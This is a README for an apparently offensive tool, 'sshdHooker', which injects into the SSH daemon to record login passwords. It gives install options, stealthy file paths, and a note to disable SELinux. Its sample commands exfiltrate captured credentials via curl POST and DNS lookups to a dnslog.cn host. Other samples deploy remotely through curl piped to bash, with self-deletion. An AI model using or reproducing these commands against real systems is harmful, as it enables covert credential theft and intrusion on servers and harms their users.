Awesome

what's this?

SSHD injector, and then you can record passwords or do other operations.

Need to close selinux

English | 中文文档

how to use

auto installer

anto installer，Only temporarily supports x64/aarch64

Run:

bash install.sh or bash install_aarch64.sh

Login with ssh password after running，The password record address is /tmp/.password.txt. default evil so path is /tmp/hello.so，default injector path is/tmp/.i

Other parameters:

    -s   Manually specify the sshd process id to be injected (usually it will be obtained automatically)
    -e   custom so file path，default is /tmp/.g.so
    -o   custom injector path，default is /bin/ntpd
    -m   change mode,defulat is 0, mode is 0 is to output to the file，output path is /tmp/.password.txt ，mode is 1 is to command execution mode
    -p   change payload，defsult is /tmp/.password.txt,if mode is 1，then use snsprintf to format the command and execute,Make sure the command contains both %s for format username and password
    -d   anto delete,If the value is anyone, any password is captured and deleted.Otherwise, it will be deleted after matching the entered username.
    -l   Specify the libc path. The default addressing is to find libc-xxxx.so and libc.so.x, but it does not rule out that there will be other strange libc names, so the manual specification function is added. For details, please check /proc/pid Find the libc name in /maps

samples

http send password

bash install.sh -p "curl -X POST -d 'username=%s\&password=%s' --connect-timeout 1 -m 1 http://127.0.0.1" -m 1

dns send password and self-delete (Please make sure that your command is not blocked, because the actual use of this program is that the system is an online program, if the command is blocked, it will cause the ssh login program to be blocked)

bash install.sh -p 'ping `echo %s-%s|xxd -ps`.k9lovy.dnslog.cn -c 1' -m 1 -d anyone

Fast remote automatic deployment and self-delete for If any user login succeeds

curl -L https://github.com/9bie/sshdHooker/releases/download/1.0.4/sshdHooker.sh | bash -s -- -d anyone

Fast remote automatic deployment and used by http send password and self-delete for If any user login succeeds (Recommend)

curl -L https://github.com/9bie/sshdHooker/releases/download/1.0.4/sshdHooker.sh | bash -s -- -p "curl -X POST -d 'username=%s\&password=%s' --connect-timeout 1 -m 1 http://127.0.0.1" -m 1 -d anyone

debug

use

gcc -shared inject_got.c -ldl -fPIC -o test2.so -std=c99

mv test2.so /tmp/hello.so

gcc sshdHooker.c shellcode.s -g -o inject -ldl -lpthread

sudo ./inject sshd_pid

todo

• add x86/arm support
• bypass SELINUX